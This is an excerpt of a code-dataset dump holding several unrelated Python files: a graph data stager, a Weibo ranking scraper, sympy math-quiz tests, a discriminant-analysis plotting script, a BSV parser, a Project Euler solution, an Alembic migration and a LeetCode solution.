our measurement infers negative edges\n # cannot_link_labels = GraphDataStager.generate_communities_cannot_link_labels(\n # labels_nodes=edge_labels_nodes,\n # must_link_labels=self.edge_labels,\n # graph=self.graph,\n # seed=for the millionth time pass the damn seed here!> to make your experiments predictable\n # )\n # self.edge_labels.update(cannot_link_labels)\n\n # now save the labels and graph\n self.save_graph()\n self.save_edge_labels()\n\n def _generate_graph_and_labels_socialbot(self):\n\n if self.num_points_sample is not None:\n raise GraphDataStagerException(\"socialbot dataset does not support node sampling in GDA\")\n\n tmp_graph = list()\n tmp_node_id_mapping = dict() # dict: str node ID -> int node ID\n tmp_graph_nodes = set()\n\n id_gen = itertools.count()\n\n start_time = default_timer()\n print(\"loading graph from file...\", end=\"\", flush=True)\n\n with open(os.path.join(self.input_data_dir, \"post_graph.jsonl\")) as f:\n for line in f:\n line_dict = json.loads(line)\n str_node_id_1 = line_dict[\"id1\"]\n str_node_id_2 = line_dict[\"id2\"]\n weight = line_dict[\"sim\"]\n\n if str_node_id_1 in tmp_node_id_mapping:\n node_id_1 = tmp_node_id_mapping[str_node_id_1]\n else:\n node_id_1 = next(id_gen)\n tmp_node_id_mapping[str_node_id_1] = node_id_1\n if str_node_id_2 in tmp_node_id_mapping:\n node_id_2 = tmp_node_id_mapping[str_node_id_2]\n else:\n node_id_2 = next(id_gen)\n tmp_node_id_mapping[str_node_id_2] = node_id_2\n\n if weight >= self.sim_threshold:\n if node_id_1 not in tmp_graph_nodes:\n tmp_graph_nodes.add(node_id_1)\n if node_id_2 not in tmp_graph_nodes:\n tmp_graph_nodes.add(node_id_2)\n tmp_graph.append((node_id_1, node_id_2, weight))\n\n print(\" done. (time={:.2f} s)\".format(default_timer() - start_time))\n\n start_time = default_timer()\n print(\"reorganizing graph in memory...\", end=\"\", flush=True)\n # needs to be done so that node IDs are contiguous 0-indexed\n\n reverse_tmp_node_id_mapping = reverse_dict(tmp_node_id_mapping)\n tmp_to_node_id_mapping = dict()\n self.node_id_mapping = dict()\n for new_node_id, tmp_node_id in enumerate(tmp_graph_nodes):\n tmp_to_node_id_mapping[tmp_node_id] = new_node_id\n self.node_id_mapping[reverse_tmp_node_id_mapping[tmp_node_id]] = new_node_id\n del tmp_node_id_mapping\n del reverse_tmp_node_id_mapping\n\n self.graph.clear()\n while tmp_graph:\n tmp_node_id_1, tmp_node_id_2, weight = tmp_graph.pop()\n self.graph[tmp_to_node_id_mapping[tmp_node_id_1], tmp_to_node_id_mapping[tmp_node_id_2]] = weight\n del tmp_graph\n\n self.graph_nodes.clear()\n for tmp_node_id in tmp_graph_nodes:\n self.graph_nodes.add(tmp_to_node_id_mapping[tmp_node_id])\n del tmp_graph_nodes\n del tmp_to_node_id_mapping\n\n print(\" done. 
(time={:.2f} s)\".format(default_timer() - start_time))\n\n print(\"saving graph to file...\")\n self.save_graph()\n\n # socialbot has human labels; shouldn't be output by stager\n # self.save_edge_labels()\n\n @property\n def node_based_graph(self):\n \"\"\"\n Getter for self.node_based_graph.\n\n This system is good because some algorithms don't need\n self.node_based_graph at all, so this way the node-based graph is only\n computed if it is needed, AND only computed once.\n\n :return: node based graph\n :rtype: dict\n \"\"\"\n if self._node_based_graph is None:\n\n # defaultdict makes the code much cleaner\n node_based_graph = defaultdict(dict)\n for (id1, id2), weight in self.graph.items():\n node_based_graph[id1][id2] = weight\n node_based_graph[id2][id1] = weight\n\n # conversion to dict avoids new keys being added by attempted key access, and is O(N)\n self._node_based_graph = dict(node_based_graph)\n\n return self._node_based_graph\n\n def _generate_0indexed_sequential_id_mapping(self):\n \"\"\"\n Generate a mapping and reverse mapping for the graph nodes, where the\n new IDs are 0-indexed and sequential.\n GDA node IDs are the ones used in self.graph_nodes and self.graph and\n self.node_based_graph.\n :return: ID mapping (GDA node ID -> new node ID)\n reverse ID mapping (new node ID -> GDA node ID)\n :rtype: (dict[int, int], dict[int, int])\n \"\"\"\n id_mapping = dict() # dict: new node ID -> GDA node ID\n reverse_id_mapping = dict() # dict: GDA node ID -> new node ID\n for new_node_id, gda_node_id in enumerate(sorted(self.graph_nodes)):\n id_mapping[gda_node_id] = new_node_id\n reverse_id_mapping[new_node_id] = gda_node_id\n return id_mapping, reverse_id_mapping\n\n @staticmethod\n def _write_mapping(id_mapping, filename):\n \"\"\"\n Write an ID mapping to a file.\n :param id_mapping: dict: old node ID -> new node ID\n :type id_mapping: dict[int, int]\n :param filename:\n :type filename: str\n \"\"\"\n with open(filename, \"w\") as f:\n for old_node_id, new_node_id in id_mapping.items():\n f.write(\"{}\\t{}\\n\".format(old_node_id, new_node_id))\n\n @staticmethod\n def check_algorithms(algorithms):\n \"\"\"\n Checks if algos are valid, and if not, raises exception.\n :param algorithms:\n :type algorithms: collections.Iterable[str]\n \"\"\"\n for algorithm in algorithms:\n if algorithm not in ALGO_NAMES:\n raise GraphDataStagerException(\n \"Valid algorithm names are: {}. 
Algorithm {} is not supported!\".format(ALGO_NAMES, algorithm)\n )\n\n def generate_algorithm_graph(self, algorithm):\n \"\"\"\n :param algorithm:\n :type algorithm: str\n \"\"\"\n if len(self.graph) == 0:\n raise GraphDataStagerException(\"graph cannot be empty when calling generate_algorithm_graph\")\n algorithm_dir = os.path.join(self.output_data_dir, algorithm)\n\n if algorithm == \"autohds-g\":\n\n if self.node_id_mapping is None:\n # simulates a dictionary\n # reverse_id_mapping[1234] == \"1234\"\n reverse_id_mapping = IntToStrDict()\n else:\n reverse_id_mapping = reverse_dict(self.node_id_mapping) # int ID -> string ID\n\n # autohds-g is the reference algorithm being measured and needs to be run through genediver so it is staged\n # in the top level output dir\n if GraphDataStager.DATA_NAMES[self.data_name][\"save_autoHDS-G_native_format\"]:\n with open(os.path.join(self.output_data_dir, \"graph.jsonl\"), \"w\") as algorithm_graph_file:\n for node in self.node_based_graph:\n algorithm_graph_file.write(json.dumps({\n \"id\": node,\n \"connections\": tuple(self.node_based_graph[node].items())\n }) + \"\\n\")\n\n if self.node_id_mapping is not None:\n self._write_mapping(reverse_id_mapping, os.path.join(self.output_data_dir, \"graph.mapping.tsv\"))\n\n else:\n\n with open(os.path.join(self.output_data_dir, \"prestaging_graph.jsonl\"), \"w\") as algorithm_graph_file:\n for (id1, id2), sim in self.graph.items():\n algorithm_graph_file.write(json.dumps({\n \"id1\": reverse_id_mapping[id1],\n \"id2\": reverse_id_mapping[id2],\n \"sim\": sim\n }) + \"\\n\")\n\n open(os.path.join(self.output_data_dir, \"experiment_params.txt\"), \"a\").close() # touch\n\n else:\n # create algorithm directory\n if not os.path.exists(algorithm_dir):\n os.makedirs(algorithm_dir)\n\n writer = ALGORITHMS[algorithm](algorithm_dir)\n # we need an ID mapping to make sure the node IDs are contiguous\n id_mapping, _ = self._generate_0indexed_sequential_id_mapping()\n\n # self.graph is (node1,node2): weight, but write graph takes the connection format of:\n # [{\"id\":1, \"connections\":[(node2, weight)]}]\n # todo: only used here, so doesn't need to be a self variable right?\n connections_graph = dict()\n for (node_id_1, node_id_2), weight in self.graph.items():\n node_id_1 = id_mapping[node_id_1]\n node_id_2 = id_mapping[node_id_2]\n if node_id_1 not in connections_graph:\n connections_graph[node_id_1] = list()\n if node_id_2 not in connections_graph:\n connections_graph[node_id_2] = list()\n connections_graph[node_id_1].append((node_id_2, weight))\n connections_graph[node_id_2].append((node_id_1, weight))\n\n connections_list = list()\n for node_id_1, connections in connections_graph.items():\n node_information = {\n \"id\": node_id_1,\n \"connections\": connections\n }\n connections_list.append(node_information)\n writer.write_graph(\n graph=connections_list,\n num_nodes=len(self.graph_nodes),\n num_edges=len(self.graph)\n )\n\n # write node ID mapping to file in algo staging dir\n self._write_mapping(\n id_mapping,\n os.path.join(algorithm_dir, \"id_mapping.tsv\")\n )\n\n def save_mapping(self):\n \"\"\"\n Write a TSV file out to the data set directory containing the node ID\n mapping (\"old_id\\tnew_id\").\n If the nodes were not mapped, the file will not be saved.\n :return: whether the mapping was saved\n :rtype: bool\n \"\"\"\n nodes = self.graph_nodes.copy()\n if self.edge_labels:\n for node_id_1, node_id_2 in self.edge_labels:\n if node_id_1 not in nodes:\n nodes.add(node_id_1)\n if node_id_2 not in 
nodes:\n nodes.add(node_id_2)\n with open(os.path.join(self.output_data_dir, \"nodes\"), \"w\") as f:\n f.write(\"\\n\".join(map(str, nodes)))\n del nodes\n\n if self.node_id_mapping is None:\n return False\n self._write_mapping(\n self.node_id_mapping,\n os.path.join(self.output_data_dir, \"gda_id_mapping.tsv\")\n )\n return True\n\n def print_metrics(self):\n \"\"\"\n prints metrics\n \"\"\"\n print(\"Graph Data Stager metrics: \" + json.dumps({\n \"num_nodes\": len(self.graph_nodes),\n \"num_label_edges\": len(self.edge_labels),\n \"num_partitional_labels\": len(self.partitional_labels),\n \"num_graph_edges\": len(self.graph)\n }, indent=4))\n\n @staticmethod\n def generate_communities_cannot_link_labels(labels_nodes, must_link_labels, graph, seed):\n \"\"\"\n generates cannot link labels given must link labels\n :param labels_nodes: nodes that appear in the must-link labels\n :param must_link_labels: dict of must-link edge IDs\n :param graph: dict of graph edges keyed by sorted edge ID\n :param seed: seed for the random sampling\n :return: dict mapping cannot-link edge IDs to 0\n \"\"\"\n # Generate cannot_link labels by finding edge_ids with nodes in\n # edge_labels_nodes that do not meet the jaccard specifications\n print(\"##### Generating cannot link labels\")\n num_must_link_labels = len(must_link_labels)\n\n # TODO: this needs to be in the CLI\n negative_edge_multiples = 2.0\n random = Random(seed)\n\n max_iterations = comb(len(labels_nodes), 2)\n matrix_density = num_must_link_labels / max_iterations\n # we want more negative than positive edges\n target_num_cannot_link_labels = int(negative_edge_multiples * num_must_link_labels)\n # we need to process a little bit extra to get target_num_cannot_link_labels negative edges\n negative_edge_try_count = 1.0 / (1 - matrix_density) * target_num_cannot_link_labels\n # we will produce 2 sets of vertices from original label_nodes using sampling with replacement\n # and then we will zip them together to get the edges\n node_a_sample = list()\n node_b_sample = list()\n # we do this in chunks to make the program run faster even though theoretically this isn't a correct sample\n chunk_size = round(negative_edge_try_count / 1000)\n if chunk_size < 1:\n chunk_size = 1\n num_iterations = int(negative_edge_try_count / chunk_size)\n ticker_size = max(1, int(num_iterations / 20)) # max() guards against a zero ticker on small runs\n for i in range(num_iterations):\n node_a_chunk = random.sample(labels_nodes, chunk_size)\n node_a_sample.extend(node_a_chunk)\n node_b_chunk = random.sample(labels_nodes, chunk_size)\n node_b_sample.extend(node_b_chunk)\n if i % ticker_size == 0:\n print(\"Sampled {} chunks...\".format(i))\n\n num_cannot_link_labels = 0\n cannot_link_labels = dict()\n ticker_size = max(1, int(negative_edge_try_count / 20))\n for node_a, node_b in zip(node_a_sample, node_b_sample):\n # create sorted edge id since self.graph and self.edge_labels both have sorted edge_ids\n if node_a > node_b:\n edge_id = (node_b, node_a)\n else:\n edge_id = (node_a, node_b)\n # cannot link labels can't be must-link labels or edges in the graph\n # the sampling can produce duplicates so don't add an edge if it's already been added\n if (edge_id in graph) or (edge_id in must_link_labels) or (edge_id in cannot_link_labels):\n continue\n\n cannot_link_labels[edge_id] = 0\n num_cannot_link_labels += 1\n if num_cannot_link_labels % ticker_size == 0:\n print(\"Generated {} cannot link labels...\".format(num_cannot_link_labels))\n\n return cannot_link_labels\n\n def save_data_params(self):\n \"\"\"\n writes the data parameters to params.json in the output directory\n :return:\n \"\"\"\n params = {\"sim\": self.sim_threshold, \"num_points\": self.num_points_sample}\n params.update(self.DATA_NAMES[self.data_name])\n\n with 
open(os.path.join(self.output_data_dir, \"params.json\"), \"w\") as f:\n f.write(json.dumps(params))\n","sub_path":"python/graphDataAnalysis/GraphDataStager.py","file_name":"GraphDataStager.py","file_ext":"py","file_size_in_byte":55966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"59036214","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Dec 3 21:31:12 2018\r\n\r\n@author: pc1\r\n\"\"\"\r\n\r\nimport re\r\nimport requests\r\nimport time\r\nfrom requests.exceptions import RequestException\r\nfrom scrapy import Selector\r\n\r\ndef get_page(url):\r\n try:\r\n headers = {\r\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'\r\n }\r\n response = requests.get(url,headers=headers)\r\n if response.status_code==200:\r\n return response.text\r\n return None\r\n except RequestException:\r\n return None\r\n \r\ndef page(offset):\r\n link='https://weibo.cn/pub/top?page='+str(offset)\r\n return link\r\n\r\ndata=[]\r\n\r\nfor i in range(1,11):\r\n html_doc = get_page(page(i))\r\n selector=Selector(text=html_doc)\r\n # extract() returns the full list of matched image URLs; extract_first() would\r\n # return a single string, and zip() below would then iterate over its characters\r\n images = selector.css('a img::attr(src)').extract()\r\n avatars = selector.xpath('//table/tbody/tr/td[2]/a[1]/text()').extract()\r\n powers = selector.xpath('//table/tbody/tr/td[2]/text()').extract()\r\n for image,avatar,power in zip(images,avatars,powers):\r\n data.append({\r\n '头像信息':image,\r\n '昵称':avatar,\r\n '影响力':power\r\n })\r\n time.sleep(1)\r\n \r\nprint(data)","sub_path":"scrapy简单操练.py","file_name":"scrapy简单操练.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"292983594","text":"import unittest\n\nfrom . 
import MathQuiz, is_math_quiz_enabled\nfrom stepic_plugins.exceptions import FormatError\n\n\n@unittest.skipUnless(is_math_quiz_enabled(), 'sympy is not installed')\nclass MathQuizCheckTest(unittest.TestCase):\n def setUp(self):\n self.default_numerical_test = {\n 'z_re_min': '2',\n 'z_re_max': '3',\n 'z_im_min': '-1',\n 'z_im_max': '1',\n 'max_error': '1e-06',\n 'integer_only': False,\n }\n\n def test_invalid_sources(self):\n diff = [\n {'z_re_min': 'not-a-number'},\n {'z_re_max': 'not-a-number'},\n {'z_im_min': 'not-a-number'},\n {'z_im_max': 'not-a-number'},\n {'max_error': 'not-a-number'},\n {'z_re_min': '42', 'z_re_max': '24'},\n {'z_im_min': '42', 'z_im_max': '24'},\n {'max_error': '-1'},\n ]\n\n for bad_numerical_test in [dict(self.default_numerical_test, **d) for d in diff]:\n bad_source = {'answer': 'x', 'numerical_test': bad_numerical_test}\n with self.assertRaises(FormatError):\n MathQuiz(MathQuiz.Source(bad_source))\n\n def check(self, answer, reply, result, feedback_contains=None,\n feedback_not_contains=None, **kwargs):\n quiz = MathQuiz(MathQuiz.Source({\n 'answer': answer,\n 'numerical_test': dict(self.default_numerical_test, **kwargs),\n }))\n score, feedback = quiz.check(reply, '')\n self.assertEqual(score, result, feedback)\n if feedback_contains is not None:\n if not isinstance(feedback_contains, (list, tuple)):\n feedback_contains = [feedback_contains]\n for msg in feedback_contains:\n self.assertIn(msg, feedback, \"Feedback should contain '{0}'\".format(msg))\n if feedback_not_contains is not None:\n if not isinstance(feedback_not_contains, (list, tuple)):\n feedback_not_contains = [feedback_not_contains]\n for msg in feedback_not_contains:\n self.assertNotIn(msg, feedback, \"Feedback should not contain '{0}'\".format(msg))\n\n def test_check(self):\n self.check('cos(2*x)', 'cos(x+x)', True)\n self.check('cos(2*x)', 'cos(x+x+x)', False)\n self.check('cos(pi)', '-1', True)\n self.check('cos(pi)', '-3', False)\n self.check('x + y', '2*x + y - x', True)\n self.check('pi', '3.141592', True)\n self.check('pi', '3.1415', False)\n self.check('pi', '3.1415', True, max_error='1e-04')\n self.check('33**12-(8*33**7-3*33**2)-2*(9*33**8-10*33**4+1)+2*12*33**3+20*33**4-6',\n '(33**12)-2*(12-3)*(33**(12-4))-(12-4)*(33**(12-5))+2*10*(33**3)*2+6*(33**2)*2',\n False)\n self.check('7**7 / (2**2 * 5**5)', '(3.5**3.5 / 2.5**2.5)**2', True)\n self.check('2*floor(n/2)+n-5', '4*(ceiling(n/2)-3)+3*(1-(n-2*floor(n/2)))+4', False)\n self.check('2*floor(n/2)+n-5', '4*(ceiling(n/2)-3)+3*(1-(n-2*floor(n/2)))+4', True,\n integer_only=True)\n\n def test_check_inequality(self):\n self.check('x > 5', 'x > 5', True)\n self.check('x > -5', 'x - 2 > -7', True)\n self.check('5 <= -2 + sin(x)', 'sin(x) + 4 >= 11', True)\n self.check('x < y ^ z', 'y ^ z > x', True)\n self.check('x > 5', '5', False, feedback_contains='must be an inequality')\n self.check('x > 5', 'x > 3', False, feedback_not_contains='Cannot check answer')\n self.check('x >= 0', 'x > 0', False, feedback_not_contains='Cannot check answer')\n self.check('x >= y + cos(2*x)', 'x > 0', False, feedback_not_contains='Cannot check answer')\n self.check('x', 'x > 5', False,\n feedback_contains='must not be an inequality',\n feedback_not_contains='Cannot check answer')\n\n def test_check_trigonometric_misnaming(self):\n feedback_pattern = 'You wrote \"{wrote}\", maybe you meant to write \"{meant}\".'\n sympy_trigonometric_notation_map = {\n 'tg': 'tan',\n 'ctg': 'cot',\n 'arccos': 'acos',\n 'arcsin': 'asin',\n 'arctg': 'atan',\n 'atg': 'atan',\n 
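# the remaining entries are alternate spellings of inverse cotangent, which sympy names acot:\n 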
'arcctg': 'acot',\n 'actg': 'acot',\n }\n for f, f_correct in sympy_trigonometric_notation_map.items():\n answer = '{func}(x)'.format(func=f_correct)\n reply = '{func}(x)'.format(func=f)\n expected_feedback = feedback_pattern.format(wrote=f, meant=f_correct)\n\n self.check(answer, reply, False, feedback_contains=expected_feedback)\n self.check('E', 'e', False, feedback_contains=feedback_pattern.format(wrote='e', meant='E'))\n self.check('x+acot(E + y)', 'x+arcctg(e + y)', False,\n feedback_contains=['wrote \"e\"', 'wrote \"arcctg\"'],\n feedback_not_contains=['wrote \"ctg\"', 'wrote \"tg\"'])\n","sub_path":"stepic_plugins/quizzes/math/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"161400631","text":"import matplotlib\nmatplotlib.use('Agg')\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport sys\n\nX=np.loadtxt(sys.argv[1]+'/q4x.dat')\nX=X-np.outer(np.ones(X.shape[0]),np.mean(X,axis=0))\nX=X/np.outer(np.ones(X.shape[0]),np.std(X,axis=0))\ny_file=open(sys.argv[1]+'/q4y.dat',\"r\")\ny_list=[]\nm0 = 0\nm1 = 0\nfor i in range(X.shape[0]):\n word = y_file.readline()\n if word == 'Alaska\\n':\n y_list.append(0)\n m0+=1\n if word == 'Canada\\n':\n y_list.append(1)\n m1+=1\ny=np.array(y_list)\n\n# part1 starts here\nmew0 = np.zeros((1,X.shape[1]))\nmew1 = np.zeros((1,X.shape[1]))\nfor i in range(X.shape[0]):\n if y[i]:\n mew1 = mew1 + X[i]\n else:\n mew0 = mew0 + X[i]\nmew0 = mew0/m0\nmew1 = mew1/m1\nsigma = np.zeros((X.shape[1],X.shape[1]))\nfor i in range(X.shape[0]):\n if y[i]:\n sigma = sigma + np.matmul((X[i]-mew1).T,(X[i]-mew1))\n else:\n sigma = sigma + np.matmul((X[i]-mew0).T,(X[i]-mew0))\nsigma = sigma/X.shape[0] # normalize the shared covariance by the number of examples, not the number of features\n# part1 ends here\n\n# part2 starts here\ny0_x0 = []\ny0_x1 = []\ny1_x0 = []\ny1_x1 = []\nfor i in range(X.shape[0]):\n if y[i]:\n y1_x0.append(X[i,0])\n y1_x1.append(X[i,1])\n else:\n y0_x0.append(X[i,0])\n y0_x1.append(X[i,1])\nplt.title('Decision Boundary')\nplt.xlabel('growth ring diameters in fresh water')\nplt.ylabel('growth ring diameters in marine water')\nplt.scatter(y0_x0,y0_x1,color='tomato',marker='o',label='Alaska')\nplt.scatter(y1_x0,y1_x1,color='green',marker='^',label='Canada')\nplt.legend()\n# part2 ends here\n\n# part3 starts here\nx0 = np.outer(np.linspace(min(X[:,0]),max(X[:,0]),30),np.ones(30))\nx1 = np.outer(np.ones(30),np.linspace(min(X[:,1]),max(X[:,1]),30))\nz = np.outer(np.ones(30),np.ones(30))\nfor i in range(30):\n for j in range(30):\n x = [x0[i][j],x1[i][j]]\n z[i][j] = np.matmul((x-mew1),np.matmul(np.linalg.inv(sigma),(x-mew1).T)) - np.matmul((x-mew0),np.matmul(np.linalg.inv(sigma),(x-mew0).T))\nplt.contour(x0,x1,z,colors='m',levels=[0])\n# part3 ends here\n\n# part4 starts here\nsigma0 = np.zeros((X.shape[1],X.shape[1]))\nsigma1 = np.zeros((X.shape[1],X.shape[1]))\nfor i in range(X.shape[0]):\n if y[i]:\n sigma1 = sigma1 + np.matmul((X[i]-mew1).T,(X[i]-mew1))\n else:\n sigma0 = sigma0 + np.matmul((X[i]-mew0).T,(X[i]-mew0))\nsigma0 = sigma0/m0\nsigma1 = sigma1/m1\n# part4 ends here\n\n# part5 starts here\nz = np.outer(np.ones(30),np.ones(30))\nfor i in range(30):\n for j in range(30):\n x = np.array([[x0[i][j],x1[i][j]]])\n phi = m1/X.shape[0]\n a = np.matmul(x,np.matmul(np.linalg.inv(sigma1)-np.linalg.inv(sigma0),x.T))\n b = np.matmul(x,np.matmul(np.linalg.inv(sigma1),mew1.T))\n c = np.matmul(x,np.matmul(np.linalg.inv(sigma0),mew0.T))\n d = 
np.matmul(mew0,np.matmul(np.linalg.inv(sigma0),mew0.T))\n e = np.matmul(mew1,np.matmul(np.linalg.inv(sigma1),mew1.T))\n f = math.log(phi/(1-phi))\n g = math.log(np.linalg.det(sigma0)/np.linalg.det(sigma1))\n z[i][j] = a - 2*b + 2*c - d + e - 2*f - g\nplt.contour(x0,x1,z,colors='b',levels=[0])\nplt.savefig(sys.argv[2]+'/q4e.png')\n# part5 ends here\n","sub_path":"2018CS50098/q4/q4e.py","file_name":"q4e.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"496328772","text":"from collections import deque\n\n\ndef readBsv(fileName=None, text=None, sep=('][', ')(', '}{')):\n response = {}\n if(fileName is not None):\n f = open(fileName, 'r')\n unsplitBsv = f.read()\n elif(text is not None):\n unsplitBsv = text\n\n firstSep = unsplitBsv[0:2]\n splitBsv = deque(unsplitBsv.split(sep[0]))\n\n if (firstSep == sep[0]):\n #print 'first'\n # list() so the filtered values can be counted and indexed under Python 3\n cleanList = list(filter(lambda a: a != '', splitBsv))\n rows = len(splitBsv) - len(cleanList) - 1\n #print rows\n columns = [i for i, a in enumerate(splitBsv) if a != '']\n nbrOfColumns = len(columns) // rows\n #print nbrOfColumns\n cleanList = list(filter(lambda a: a != '', splitBsv))\n #print cleanList\n for c in range(nbrOfColumns):\n col = deque()\n for r in range(0, rows):\n col.append(cleanList[(nbrOfColumns * r) + c])\n\n colName = 'X' + str(c + 1)\n response[colName] = col\n\n if (firstSep == sep[1]):\n rows = splitBsv.count(sep[1]) - 1\n columns = [i for i, a in enumerate(splitBsv) if a != sep[1]]\n nbrOfColumns = len(columns) // rows\n cleanList = list(filter(lambda a: a != sep[1], splitBsv))\n for c in range(nbrOfColumns):\n col = deque()\n for r in range(0, rows):\n col.append(cleanList[(nbrOfColumns * r) + c])\n\n colName = 'X' + str(c + 1)\n response[colName] = col\n\n if (firstSep == sep[2]):\n response = {}\n hdr = sep[2] + sep[1]\n hdrTxt = splitBsv[0]\n splitHdr = hdrTxt.split(sep[2])\n splitHdr = splitHdr[1:len(splitHdr) - 1]\n splitBsv = [splitBsv[i] for i in range(1, len(splitBsv))]\n rows = 0\n for val in splitBsv:\n if val == sep[1]:\n rows = rows + 1\n\n for colName in splitHdr:\n response[colName] = deque()\n\n columns = len(response)\n cleanList = list(filter(lambda a: a != sep[1], splitBsv))\n for c, colName in enumerate(splitHdr):\n col = deque()\n for r in range(rows):\n col.append(cleanList[(columns * r) + c])\n\n response[colName] = col\n\n return response\n\n\ndef writeBsv(x, filepath=None, sep=('][', ')(', '}{')):\n response = \"\"\n hdrList = list(x.keys()) # list() so the headers can be indexed under Python 3\n response = sep[2] + sep[0] + sep[0].join(hdrList) + sep[0] + sep[2]\n nbrOfRows = len(x[hdrList[1]])\n for r in range(0, nbrOfRows):\n row = deque()\n for h, hdr in enumerate(hdrList):\n row.append(x[hdr][r])\n\n response = response + sep[1] + sep[0] + sep[0].join(row) + sep[0]\n response = response + sep[1] + '\\n'\n if filepath is None:\n return response\n else:\n f = open(filepath, 'w')\n f.write(response)\n f.close()\n\n\n#print readBsv(text='][b][s][][v][o][][m][g][')\n#print readBsv(text=\")(][b][s][v][)(][o][m][g][)(\")\n#print readBsv(text=\"}{Col1}{Col2}{)(][b][s][)(][v][o][)(][m][g][)(\")","sub_path":"bsv.py","file_name":"bsv.py","file_ext":"py","file_size_in_byte":2978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"15079425","text":"#!/usr/bin/python\n# Solved by Bogdan Trif @ Completed on Sat, 24 Sep 2016, 12:08\n#The Euler Project https://projecteuler.net\n'''\nPowerful digit sum - Problem 56\nA googol (10**100) is a massive number: one followed 
by one-hundred zeros; 100**100 is almost unimaginably large:\none followed by two-hundred zeros. Despite their size, the sum of the digits in each number is only 1.\nConsidering natural numbers of the form, a**b, where a, b < 100, what is the maximum digital sum?\n'''\n\n#this one is easy, just compute the numbers power and sum the digits.\n\ncounter=1\nmaxval=0\nfor a in range(50, 100):\n for b in range(80,100):\n counter+=1\n c = list(str(a**b))\n S=0\n for i in range(len(c)):\n S += int(c[i])\n if S > 950 :\n print(str(counter)+'. ',S , ' ',a,'**',b, len(str(a**b)),' ',a**b )\n if maxval < S:\n maxval = S\nprint('The maximum value is : ', maxval)\n\nprint('\\n===============OTHER SOLUTIONS FROM THE EULER FORUM ==============')\nprint('\\n--------------------------SOLUTION 1, travelalone from China --------------------------')\n\n\nmax=0\nfor a in range(1,100):\n for b in range(1,100):\n temp = sum(map(int,list(str(a**b))))\n if temp > max:\n max =temp\nprint (max)\n\nprint('\\n--------------------------SOLUTION 2, LIST COMPREHENSION, zinebl from Algeria --------------------------')\n# (the list-comprehension solution itself was not preserved)","sub_path":"Project EULER/pb056 Powerful digit sum.py","file_name":"pb056 Powerful digit sum.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"202520467","text":"\"\"\"empty message\n\nRevision ID: 87d6c4ba4e59\nRevises: \nCreate Date: 2019-03-24 03:49:30.722354\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '87d6c4ba4e59'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('user',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('username', sa.String(length=64), nullable=False),\n sa.Column('usertype', sa.String(length=64), nullable=False),\n sa.Column('nricHash', sa.String(length=128), nullable=True),\n sa.Column('points', sa.Integer(), nullable=True),\n sa.Column('passwordHash', sa.String(length=128), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_user_username'), 'user', ['username'], unique=True)\n op.create_table('question',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('questionTitle', sa.Text(), nullable=False),\n sa.Column('questionOption', sa.Text(), nullable=False),\n sa.Column('userid', sa.Integer(), nullable=False),\n sa.Column('questionType', sa.String(length=64), nullable=False),\n sa.Column('dateTime', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['userid'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_question_dateTime'), 'question', ['dateTime'], unique=False)\n op.create_table('response',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user', sa.Integer(), nullable=False),\n sa.Column('question', sa.Integer(), nullable=False),\n sa.Column('response', sa.Text(), nullable=False),\n sa.Column('dateTime', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['question'], ['question.id'], ),\n sa.ForeignKeyConstraint(['user'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_response_dateTime'), 'response', ['dateTime'], unique=False)\n op.create_index(op.f('ix_response_response'), 'response', ['response'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_index(op.f('ix_response_response'), table_name='response')\n op.drop_index(op.f('ix_response_dateTime'), table_name='response')\n op.drop_table('response')\n op.drop_index(op.f('ix_question_dateTime'), table_name='question')\n op.drop_table('question')\n op.drop_index(op.f('ix_user_username'), table_name='user')\n op.drop_table('user')\n # ### end Alembic commands ###\n","sub_path":"base/migrations/versions/87d6c4ba4e59_.py","file_name":"87d6c4ba4e59_.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"57006365","text":"class Solution:\n def longestSubarray(self, nums) -> int:\n n = len(nums)\n pre, suf = nums[::], nums[::]\n res = 0\n for i in range(1, n):\n pre[i] = 0 if nums[i] == 0 else pre[i - 1] + 1\n res = max(res, pre[i])\n for i in range(n - 2, -1, -1):\n suf[i] = 0 if nums[i] == 0 else suf[i + 1] + 1\n res = max(res, suf[i])\n if i > 0:\n res = max(res, suf[i + 1] + pre[i - 1])\n return res if res < n else n-1\n\n\ns = Solution()\nprint(s.longestSubarray([0, 1, 1, 1, 0, 1, 1, 0, 